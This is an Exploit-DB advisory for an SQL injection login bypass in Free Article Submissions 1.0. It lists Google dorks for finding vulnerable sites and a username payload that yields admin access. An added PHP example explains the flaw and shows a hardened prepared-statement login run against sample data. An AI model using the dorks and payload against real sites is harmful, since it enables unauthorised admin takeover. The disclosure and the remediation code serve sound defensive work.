Free Article Submissions 1.0 – SQL Injection

  • Author: BarrabravaZ
    Date: 2014-12-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/35492/
  • # Exploit Title: Free Article Submissions SQL Injection Vulnerability
    # Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
     inurl:/category.php?id=2 "Arts & Entertainment"
    # Date: 07/12/2014
    # Exploit Author: BarrabravaZ
    # Vendor Homepage: http://www.articlesetup.com/
    # Software Link: [download link if available]
    # Version: 1.00
    # Tested on: Windows
    
     
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     «««:»»»Author will not be responsible for any damage.«««:»»»
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    x
    x Issue: 
    x SQL Injection Bypass Login
    x 
    x Risk level: High
    x ~ The remote attacker has the possibility to manage the website.
    x ~ The remote attacker is able to log in to the website with admin access level.
    x 
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    ##
    ## Proof Of Concept:
    ## http://127.0.0.1/admin/login.php
    ##
    ## Username :' OR 1=1 #
    ## Password :barrabravaz
    ##
    ##
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Special thanks to:
    [+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
    [+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
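
Why the proof-of-concept input bypasses the login, and a login check that resists it. This is an added example, not code from the advisory or from the vendor. The `admins` table, its columns and both function names are assumptions, and the vulnerable query is only built as a string to show what MySQL would receive.

```php
<?php
// Added example. Table/column names and both functions are assumptions;
// the product's real login.php is not shown in the advisory.

// Vulnerable pattern (string concatenation): returned as text only, to show
// what the database receives. On MySQL, '#' starts a comment, so the
// password condition is never evaluated and "OR 1=1" matches every row.
function vulnerableQuery(string $user, string $pass): string
{
    return "SELECT id FROM admins WHERE username = '$user' AND password = '$pass'";
}

// Hardened pattern: the username is a bound parameter (data, never SQL text)
// and the password is checked against a stored hash in PHP, not in the query.
function safeLogin(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pw_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    // fetchColumn() returns false when no row matched.
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed sample data in an in-memory SQLite database (runs offline).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)');
$ins = $db->prepare('INSERT INTO admins (username, pw_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

$user = "' OR 1=1 #";   // username value from the proof of concept
$pass = 'barrabravaz';  // password value from the proof of concept

// The concatenated statement, with the password test commented out by '#'.
echo vulnerableQuery($user, $pass), PHP_EOL;

// With a bound parameter the same input is only an unknown username.
var_dump(safeLogin($db, $user, $pass));
// Legitimate credentials, then a wrong password for a real account.
var_dump(safeLogin($db, 'admin', 'correct horse'));
var_dump(safeLogin($db, 'admin', 'barrabravaz'));
```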